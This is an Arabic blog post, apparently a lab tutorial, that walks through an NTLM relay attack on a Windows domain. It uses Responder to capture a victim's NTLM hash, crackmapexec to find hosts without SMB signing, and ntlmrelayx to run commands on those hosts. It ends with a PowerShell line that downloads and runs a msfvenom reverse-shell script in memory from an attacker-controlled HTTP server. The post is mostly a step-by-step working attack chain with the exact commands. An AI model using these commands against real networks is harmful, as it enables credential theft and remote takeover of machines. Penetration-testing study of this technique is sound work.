عالم البرمجة عالم البرمجة

NTLMRelayx

Ali Alshehriمنذ سنة
NTLMRelayx

بسم الله الرحمن الرحيم 

 

طبعا راح اشرح في المقالة NTLMRelayx  

الهدف اخذ شل على التارقت

طبعا فالثغرة هذي ماراح يكون لك تارقت معين الضحيه يكون عشوائي

ليش الضحيه عشوائي؟

لازم نفهم الفكره بالاول 

الضحيه بيدخل المجلد ويبحث فالشبكه عن فولدر او شير معين

 

هنا بعد مايدخل المسار بيرسل ل DNS SERVER يسأله هل الفولدر موجود ؟ اذا المستخدم مالقى المجلد في السيرفر تلقائياً بيرسل برودكاست لجميع الاجهزه اللي فالدومين يسأل  (الفولدر موجود عندك ؟)

 

الان المخترق بيكون متنصت عن طريق Responder ويرد على الضحيه يقول انه عنده 

هنا الضحيه يرسل الهاش حقه

 

الان بطبق عملي

شغلت Responder


 

هنا في جهاز الضحيه بحثت عن مجلد خاطئ

طبعاًُ لازم الفولدر يكون خطأ لانه لو صح بيرد عليه DNS SERVER ويعلمه وين الفولدر فلذالك الضحيه مايحتاج يرسل برودكاست

 

هنا جاني NTLM حق الضحيه

طبعاً لو رد عليك Responder وكتب انه قد طلع الهاش من قبل

[*] Skipping previously captured hash for MicrosoftAccount\ali

استخدم اوبشن -wv 

sudo responder -I eth0 -wv

 

الان نكرك الهاش

اذا تكرك الهاش بيصير معنا يوزر وباس

اذا ماتكرك نحاول ننفذ اوامر على جهاز ثاني من خلال الهاش 

في شرطين مهمه 

1- لازم التارقت يكون administrator

2- مايكون فيه signing فالجهاز الثاني 

كيف اعرف اذا فيه signingاو لا 

راح انفذ الامر ذا 

crackmapexec smb 192.168.25.0/24 --gen-relay-list targets.txt

 

هنا بيطلع الاجهزه اللي مافيها signing ويحفظها في ملف targets.txt

الان لازم نقفل SMB و HTTP في اعددات Responder لان NTLMRelayx بيستخدمها

مسار الكونفق

/usr/share/responder/responder.conf

نخلي smb=off و http=off

الان ننفذ ntlmrelayx على الاجهزة الي في ملف targets.txt

python ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

الان نشغل responder ونتظر الين مايغلط يوزر فالفولدر او الشير 

قدرنا ننفذ امر Whoami

طبعاً اليوزر اللي غلط فالمجلد لازم يكون administrator على الجهاز الثاني

الان بجرب اخذ شل

فالبدايه سويت ملف ps1 فيه الشل عن طريق msfvenom وشغلت سيرفر بايثون عشان اسحب الملف 

هنا نفذت الامر ذا 

powershell iex (iwr http://192.168.23.129:8080/rev.ps1 -usebasicparsing)

سويت لود على ميموري جهاز الضحيه لملف الشل

هنا جاني شل

 

اتمنى ان أكون وفقت فالشرح 

كلمات دليلية: ntlmrelayx powershell
0
إعجاب
أعجبني
492
مشاهدات
تلقائي
0
مشاركة
مشاركة
1
متابع
تابع

التعليقات (0)

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !

اشترك الآن